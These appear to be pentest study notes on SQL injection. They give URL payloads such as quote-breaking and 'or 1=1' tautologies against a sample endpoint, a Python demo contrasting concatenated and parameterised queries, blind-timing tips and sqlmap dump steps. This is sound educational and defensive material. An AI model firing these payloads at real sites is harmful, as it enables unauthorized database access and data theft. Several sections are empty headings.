SQL Injection
What is it?
Common SQL Verbs
Common SQL Statement verbs
SELECT - Retrieves data from a table
INSERT - Adds data to a table
DELETE - Removes data from a table
UPDATE - Modifies data in a table
DROP - Deletes a table
UNION - Combines data from multiple queries
SQL Query Modifiers
WHERE
AND/OR
LIMIT #1, #2
ORDER BY #
Special Characters
' and " - string delimiters
--, /*, and # - comment delimiters
* and % - wildcard characters
; - ends a SQL statement
= - equality comparison (used in WHERE clauses)
Example
When attempting a SQL injection, we ideally want to input data that first causes a syntax error, then add characters until the normal result comes back, and only then inject verbs or modifiers, knowing they will run.
Sample server side code
Normal input: Defender
URL: http://test.com/sqli.php?name=Defender
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender';
Results: Normal result

Injected input: Defender'
URL: http://test.com/sqli.php?name=Defender'
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender'';
Results: The unbalanced ' causes a syntax error

Injected input: Defender'; --
URL: http://test.com/sqli.php?name=Defender'; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender'; --';
Results: Returns the normal result (the comment hides the trailing quote and semicolon)

Injected input: Defender' or 1=1; --
URL: http://test.com/sqli.php?name=Defender' or 1=1; --
SQL Query:
SELECT *
FROM Users
WHERE lname='Defender' or 1=1; --';
Results: Returns all rows from the Users table
Balancing a payload
Quote balancing
If commenting with -- does not work, we can alternatively balance the quotes with a string comparison.
Example injection: Defender' OR 'a'='a
Example statement: SELECT ... WHERE lname='Defender' OR 'a'='a';
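The walkthrough above and the quote-balancing trick, replayed as an added example that is not from the original notes: an in-memory SQLite table named Users (constructed sample data) is queried once with the sqli.php-style string concatenation and once with a bound parameter, so the two behaviours can be compared side by side.

```python
# Added example: replays the notes' payloads against an in-memory SQLite "Users" table,
# comparing string concatenation (vulnerable) with a bound parameter (hardened).
import sqlite3

# The inputs walked through in the notes (the last one is the quote-balanced form).
PAYLOADS = [
    "Defender",
    "Defender'",
    "Defender'; --",
    "Defender' or 1=1; --",
    "Defender' OR 'a'='a",
]


def make_db():
    """Constructed sample table: three users, only one with lname 'Defender'."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER, fname TEXT, lname TEXT)")
    conn.executemany(
        "INSERT INTO Users VALUES (?, ?, ?)",
        [(1, "Dana", "Defender"), (2, "Al", "Admin"), (3, "Gus", "Guest")],
    )
    return conn


def vulnerable_lookup(conn, name):
    """The sqli.php pattern from the notes: user input spliced into the query text."""
    query = f"SELECT * FROM Users WHERE lname='{name}';"
    return conn.execute(query).fetchall()


def safe_lookup(conn, name):
    """Hardened form: the value is bound as a parameter and never parsed as SQL."""
    return conn.execute("SELECT * FROM Users WHERE lname=?;", (name,)).fetchall()


def compare(name):
    """Return (vulnerable row count or 'syntax error', parameterised row count)."""
    conn = make_db()
    try:
        vuln = len(vulnerable_lookup(conn, name))
    except sqlite3.OperationalError:  # unbalanced quote -> unterminated string literal
        vuln = "syntax error"
    return vuln, len(safe_lookup(conn, name))


if __name__ == "__main__":
    for payload in PAYLOADS:
        print(f"{payload!r:28} concatenated={compare(payload)[0]!r:>14} bound={compare(payload)[1]}")
```

The tautology and quote-balanced inputs return every row through the concatenated query, while the parameterised query returns zero rows for all of them because the whole string is compared as a literal lname.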
Column numbers balancing
INSERT and UNION statements require the number of columns to match the number used by the original query
Data type balancing
INSERT and UNION statements require data type associated with columns to match
Exploiting
DB Fingerprinting
In-band SQL injection
Blind SQL injection
Test by sending an input of test ' {sleep 10}, then {sleep 20}, and check whether the server's response time grows accordingly.
Cheat Sheet
Displayed full SQL query as a value
Tools
SQLMAP
Open-source, Python-based command-line SQL injection tool created by Bernardo Damele A. G. (@#inquisdb)
See sqlmap extended help
Test for vulnerability
Lists Database
With found database, lets list the tables
With found tables, list all columns
Dump all records on a table
Search all columns for a string (Example "pass")
Per found table and columns, dump information of query
Within a pentest you don't want to dump sensitive information, as it gets cached on your machine. Instead of --dump, you can use --count to see the number of entries, then --dump --start=1 --stop=3 to pull only a small sample.
Alternatively, dump 38th entry
Grab user and password on database management system (Used to administer DB)
SQL Injection Defenses
Resources
HUGE SQL injection cheat sheet: https://www.websec.ca/kb/sql_injection
NetSPI SQL injection wiki: https://sqlwiki.netspi.com/
Time-based Blind SQL Injection: https://www.sqlinjection.net/time-based/
OWASP Blind SQL injection: https://owasp.org/www-community/attacks/Blind_SQL_Injection
NoSQL injections: https://medium.com/bugbountywriteup/nosql-injection-8732c2140576
swisskyrepo's guide to NoSQL Injections: https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/NoSQL%20Injection
Understanding GraphQL SQL Schemas and Types: https://graphql.org/learn/schema/
byt3bl33d3r's MS SQL command reference: https://github.com/byt3bl33d3r/CrackMapExec/wiki/MSSQL-Command-Reference